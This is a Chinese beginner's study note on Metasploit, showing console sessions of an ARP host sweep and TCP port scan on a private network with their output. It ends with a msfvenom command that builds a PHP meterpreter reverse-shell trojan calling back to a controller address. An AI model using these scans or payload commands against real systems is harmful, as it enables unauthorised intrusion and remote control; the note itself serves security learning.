- 1arm-none-linux-gnueabi交叉工具链安装_arm-none-linux-gnueabi-gcc最新版
- 2用Latex排版论文(3)《控制与决策》初稿LaTex模版编译出现"\bibname undefined"解决办法
- 3cvte软件测试在线测评,CVTE笔试题总结归纳
- 4卷积神经网络实例 —— 实现手写数字识别_卷积神经网络实现手写数字识别
- 5如何用大模型做出一款属于自己的 AI 应用?
- 6python简单小游戏代码-python基础练习之几个简单的游戏
- 7SSH: windows与vscode远程连接虚拟机或服务器操作_vscode ssh remote windows
- 8MySQL查询原理简述_mysql 查询原理
- 9【时序数据库】时序数据库介绍
- 10【MySQL数据库】最全安装过程及配置详解_在 mysql.installer.plugins.server.serverconfigurati
网络安全msf学习1
赞
踩
工具:netcat
用途 :端口连接、数据提交
工具nmap
用途:端口扫描、服务识别、操作系统指纹识别
工具 httprint
用途:通过远程http指纹判断http服务类型
工具: tamper ie
用途: http数据包修改、转发工具firefox插件
2.MSF命令
msfconsole 进入
0.help /?
1.search help search 搜索
2.info 查看模块详细用法
3.use 使用
show options查看参数
4.set x y 设置参数
set rhost 192.168.0.1
5.run /expoit
6.back 退回主界面
7.quit/exit 退出msf
2.信息收集
用来发现主机的
use auxiliary/scanner/discovery/arp_sweep
例子:
msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
- Module options (auxiliary/scanner/discovery/arp_sweep):
-
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- INTERFACE no The name of the interface
- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
- metasploit.html
- SHOST no Source IP Address
- SMAC no Source MAC Address
- THREADS 1 yes The number of concurrent threads (max one per host)
- TIMEOUT 5 yes The number of seconds to wait for new data
rhosts threads timout是必填项
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhost 192.168.50.1/24
rhost => 192.168.50.1/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run
- [+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
- [+] 192.168.50.1 appears to be up (LANNER ELECTRONICS, INC.).
- [+] 192.168.50.2 appears to be up (HUAWEI TECHNOLOGIES CO.,LTD).
- [+] 192.168.50.3 appears to be up (Cisco Systems).
- [+] 192.168.50.21 appears to be up (UNKNOWN).
- [+] 192.168.50.23 appears to be up (UNKNOWN).
- [+] 192.168.50.25 appears to be up (UNKNOWN).
- [+] 192.168.50.26 appears to be up (UNKNOWN).
- [+] 192.168.50.29 appears to be up (UNKNOWN).
- [+] 192.168.50.30 appears to be up (UNKNOWN).
- [+] 192.168.50.35 appears to be up (UNKNOWN).
- [+] 192.168.50.37 appears to be up (UNKNOWN).
- [+] 192.168.50.68 appears to be up (UNKNOWN).
- [+] 192.168.50.53 appears to be up (VMware, Inc.).
- [+] 192.168.50.74 appears to be up (UNKNOWN).
- [+] 192.168.50.96 appears to be up (AIO LCD PC BU / TPV).
- [*] Scanned 256 of 256 hosts (100% complete)
- [*] Auxiliary module execution completed
msf6 > search portscan
- Matching Modules
- ================
-
- # Name Disclosure Date Rank Check Description
- - ---- --------------- ---- ----- -----------
- 0 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
- 1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
- 2 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
- 3 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
- 4 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
- 5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
- 6 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
- 7 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
-
-
- Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options
- Module options (auxiliary/scanner/portscan/tcp):
-
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- CONCURRENCY 10 yes The number of concurrent ports to check per host
- DELAY 0 yes The delay between connections, per thread, in milliseconds
- JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
- PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/usin
- g-metasploit.html
- THREADS 1 yes The number of concurrent threads (max one per host)
- TIMEOUT 1000 yes The socket connect timeout in milliseconds
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.50.96
rhosts => 192.168.50.96
msf6 auxiliary(scanner/portscan/tcp) > run
- [+] 192.168.50.96: - 192.168.50.96:135 - TCP OPEN
- [+] 192.168.50.96: - 192.168.50.96:139 - TCP OPEN
- [+] 192.168.50.96: - 192.168.50.96:445 - TCP OPEN
- [+] 192.168.50.96: - 192.168.50.96:1027 - TCP OPEN
- [+] 192.168.50.96: - 192.168.50.96:5040 - TCP OPEN
- [+] 192.168.50.96: - 192.168.50.96:8900 - TCP OPEN
- [*] 192.168.50.96: - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
正向攻击 控制机直接控制靶机
反弹攻击 控制机打开端口 靶机运行木马 反向连接控制机
制作木马、获得反弹链接的shell
完整流程如下:
1.msfvenom 生成木马文件
2、msf监听指定端口
3、访问木马文件、获得meterpreter连接
不用启动msf交互终端msfconsole就可以制作木马
使用msfvenom
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=7777 -o shell.php
启动lhost 和lport为 控制机地址和端口号。前提是控制机需要开启7777这个端口号的监听程序
